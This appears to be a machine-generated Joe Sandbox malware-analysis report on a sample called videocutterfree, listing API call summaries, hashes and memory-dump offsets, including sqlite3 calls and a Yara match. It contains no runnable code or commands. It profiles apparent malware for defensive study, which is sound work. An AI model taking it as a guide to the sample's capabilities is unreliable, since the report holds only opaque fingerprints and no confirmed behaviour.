                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CopyFile
                                                                              • String ID:
                                                                              • API String ID: 1304948518-0
                                                                              • Opcode ID: a6358ab3cc79e14e82603d5f199a7856aed5ca52aba2b33e0a7ace2c61ca735d
                                                                              • Instruction ID: 54060a4e0b486021d2bf17a4fda6439c3ee528ddcad21b09b779643b4c2b8e72
                                                                              • Opcode Fuzzy Hash: a6358ab3cc79e14e82603d5f199a7856aed5ca52aba2b33e0a7ace2c61ca735d
                                                                              • Instruction Fuzzy Hash: 54C08C3014C019EAC208C6158E4CABA336CEB0478072008F7E40BB00D0C3BE895238AF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: 0e2b379bf8df701bb9e082e776da21589b68423da4ce35769c4f870e9723cc29
                                                                              • Instruction ID: ea951d0eccb75a7dd8fe07b242e29be16940140a29eaeeef510a8f524cfeef0c
                                                                              • Opcode Fuzzy Hash: 0e2b379bf8df701bb9e082e776da21589b68423da4ce35769c4f870e9723cc29
                                                                              • Instruction Fuzzy Hash: C2C01230A48002FACB208FA0AA48A3E7A70AA04340B2008B78413B04D4C3BC96227ACF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CopyFile
                                                                              • String ID:
                                                                              • API String ID: 1304948518-0
                                                                              • Opcode ID: dbdd877f476e8134daa8ff70989df59b7b8849df53038c5e9e8b7bfa8d6e9606
                                                                              • Instruction ID: 0a6c0003d17810818e32e24976937379b2793755e25390275a802eca79c3ec72
                                                                              • Opcode Fuzzy Hash: dbdd877f476e8134daa8ff70989df59b7b8849df53038c5e9e8b7bfa8d6e9606
                                                                              • Instruction Fuzzy Hash: 22C09B601C8269B6D30457E14D0EB95791CD715741F1045FB7997750D151780191D79E
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: ManagerOpen
                                                                              • String ID:
                                                                              • API String ID: 1889721586-0
                                                                              • Opcode ID: 3fa753fb73a540c0916ca73acc636f1dcb7bfad35fc92f5c6bf39a121cc6d1ef
                                                                              • Instruction ID: ad066ec69485dcbaac9b589d4921c08d31822fb91ba140c5fda6e17a31976777
                                                                              • Opcode Fuzzy Hash: 3fa753fb73a540c0916ca73acc636f1dcb7bfad35fc92f5c6bf39a121cc6d1ef
                                                                              • Instruction Fuzzy Hash: 0DB002A054C012EDC1945B515FEC42615DD555035D37104F69313B41D086794556F57F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 1010af68774c6642705389abd77bc66d133db9020c51050a88a09524247ea922
                                                                              • Instruction ID: 32a768b1ba534ed717a7f305b72077e06fad21f955be0025f9171a67e1c04a99
                                                                              • Opcode Fuzzy Hash: 1010af68774c6642705389abd77bc66d133db9020c51050a88a09524247ea922
                                                                              • Instruction Fuzzy Hash: DCA01130888000F2C0020380AE0883A28C0A80C302A3200332A03300C082BCA802AAAF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.00000000009C9000.00000040.00001000.00020000.00000000.sdmp, Offset: 009C9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_9c9000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: b6e7345cffe73231bd9e5143992b409c7d83c170da0dcb2fb64b5df87bf3876c
                                                                              • Instruction ID: 987c6a75a6226e701e9f8a1ca7a7810206e9db859ea14dfcce9dfbd1b39b6ad5
                                                                              • Opcode Fuzzy Hash: b6e7345cffe73231bd9e5143992b409c7d83c170da0dcb2fb64b5df87bf3876c
                                                                              • Instruction Fuzzy Hash: 050188B114D304AFE301BE1BECC597BFBE8EB94625F15492DE6C142600D6726400C5A7
                                                                              APIs
                                                                                • Part of subcall function 009A03C0: OpenEventA.KERNEL32(00100002,00000000,00000000,F3247817), ref: 009A0460
                                                                                • Part of subcall function 009A03C0: CloseHandle.KERNEL32(00000000), ref: 009A0475
                                                                                • Part of subcall function 009A03C0: ResetEvent.KERNEL32(00000000,F3247817), ref: 009A047F
                                                                                • Part of subcall function 009A03C0: CloseHandle.KERNEL32(00000000,F3247817), ref: 009A04B4
                                                                              • TlsSetValue.KERNEL32(00000029,?), ref: 009A0F5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$OpenResetValue
                                                                              • String ID:
                                                                              • API String ID: 1556185888-0
                                                                              • Opcode ID: 804554f55c0dad44eaf002ce38e2e2514ef9ed8ef838a34c2bbdfea1d4c53187
                                                                              • Instruction ID: 1728b23177ca7267678b33aeb1e0883989dabe1830d0b43ef5fb046e659d7586
                                                                              • Opcode Fuzzy Hash: 804554f55c0dad44eaf002ce38e2e2514ef9ed8ef838a34c2bbdfea1d4c53187
                                                                              • Instruction Fuzzy Hash: 2A018F71A04604AFC710CF59DC05F5ABBA8FB86734F10471AF425D3280D735690086E0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: bdcbebdbb6f7f15db4c7dc23eff07e3951114280834d8a789c7b08a2081e1bed
                                                                              • Instruction ID: 106c0a3ac4104c52ca0c4bf1734aa1faa3d9ef1625e580a375a7fcf7657d485c
                                                                              • Opcode Fuzzy Hash: bdcbebdbb6f7f15db4c7dc23eff07e3951114280834d8a789c7b08a2081e1bed
                                                                              • Instruction Fuzzy Hash: B9F02B7404C217CDD21452242A9977E1150E754B46F34043BEA07B51D1CF3C4883AADF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 1586166983-0
                                                                              • Opcode ID: 3768390100765dd0fd7840000bb8a7e091128b14aca901e81db2f5b459eb6439
                                                                              • Instruction ID: 6e7810caeff14979593a4a6671e498cc303bad7c51c3d073012bd32aba86b7fc
                                                                              • Opcode Fuzzy Hash: 3768390100765dd0fd7840000bb8a7e091128b14aca901e81db2f5b459eb6439
                                                                              • Instruction Fuzzy Hash: B3C04C70504206E9D6005AB28B5D96B29A8592478472544BB9C13F01D1E7BCD412553F
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000), ref: 0040B28E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 30d1380eaadb09f23ec7e0ddeb671491397bff79c49f0536334363d3717cc57c
                                                                              • Instruction ID: 57a129716cab0bd4cead901bd99eff649662706d8b242c2422a15252d1b08e9a
                                                                              • Opcode Fuzzy Hash: 30d1380eaadb09f23ec7e0ddeb671491397bff79c49f0536334363d3717cc57c
                                                                              • Instruction Fuzzy Hash: 4AC04C75898555DFD6114BA049497A87A20E708741F110022E64AB72D0C7B54451D7DD
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 73fed765b227eaac477385221a85e0eb4651587fd74d8b3cb72dbdec540241b5
                                                                              • Instruction ID: 3609f3ce3d0b6f4b261cca4940c1d46437d504f5e24200c5344ae7737e00abed
                                                                              • Opcode Fuzzy Hash: 73fed765b227eaac477385221a85e0eb4651587fd74d8b3cb72dbdec540241b5
                                                                              • Instruction Fuzzy Hash: 51B01130288A00EAC2000B20AB0CB22BAB0BB00302F220022A203300E083BE0022EA8E
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 1586166983-0
                                                                              • Opcode ID: b86762fbc5d2eaacca143bc44e9b2eef66b47abdd0d10d6d04055930ed55f9a4
                                                                              • Instruction ID: c75203fa9b3db16dba050bbc6d6b43a70eabb19d8f0458744ca12ca473408abb
                                                                              • Opcode Fuzzy Hash: b86762fbc5d2eaacca143bc44e9b2eef66b47abdd0d10d6d04055930ed55f9a4
                                                                              • Instruction Fuzzy Hash: 4C900230244101DEE6014A725A1C21525946504781312447D5807F0190D67980215529
                                                                              APIs
                                                                              • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                              • sqlite3_step.SQLITE3 ref: 6096755A
                                                                              • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                              • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                              • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                              • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                              • sqlite3_step.SQLITE3 ref: 609679C3
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                              • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                              • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                              • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                              • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                              • sqlite3_step.SQLITE3 ref: 60967B94
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                              • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                              • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                              • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                              • memcmp.MSVCRT ref: 60967D4C
                                                                              • sqlite3_free.SQLITE3 ref: 60967D69
                                                                              • sqlite3_free.SQLITE3 ref: 60967D74
                                                                              • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                              • sqlite3_free.SQLITE3 ref: 60968002
                                                                                • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                              • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                              • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                              • sqlite3_reset.SQLITE3 ref: 60968035
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                              • sqlite3_step.SQLITE3 ref: 609680D1
                                                                              • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                              • sqlite3_reset.SQLITE3 ref: 60968104
                                                                              • sqlite3_step.SQLITE3 ref: 60968139
                                                                              • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                              • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                              • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                              • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                              • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                              • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                              • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                              • sqlite3_step.SQLITE3 ref: 6096764C
                                                                              • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                              • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                              • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                              • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                              • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                              • sqlite3_step.SQLITE3 ref: 609690E6
                                                                              • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                              • sqlite3_free.SQLITE3 ref: 60969102
                                                                              • sqlite3_free.SQLITE3 ref: 6096910D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                              • String ID: $d
                                                                              • API String ID: 2451604321-2084297493
                                                                              • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                              • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                              • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                              • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                              APIs
                                                                              • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                              • sqlite3_free.SQLITE3 ref: 60966183
                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                              • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                              • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                              • memcmp.MSVCRT ref: 6096639E
                                                                                • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                              • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                              • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                              • String ID: ASC$DESC$x
                                                                              • API String ID: 4082667235-1162196452
                                                                              • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                              • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                              • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                              • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                              APIs
                                                                              • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                              • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                              • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                              • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                              • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                              • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                              • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                              • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                              • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                              • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                              • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                              • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                              • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                              • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                              • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                              • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                              • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                              • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                              • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                              • String ID:
                                                                              • API String ID: 961572588-0
                                                                              • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                              • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                              • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                              • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                              • String ID: 2$foreign key$indexed
                                                                              • API String ID: 4126863092-702264400
                                                                              • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                              • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                              • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                              • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_stricmp
                                                                              • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                              • API String ID: 912767213-1308749736
                                                                              • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                              • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                              • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
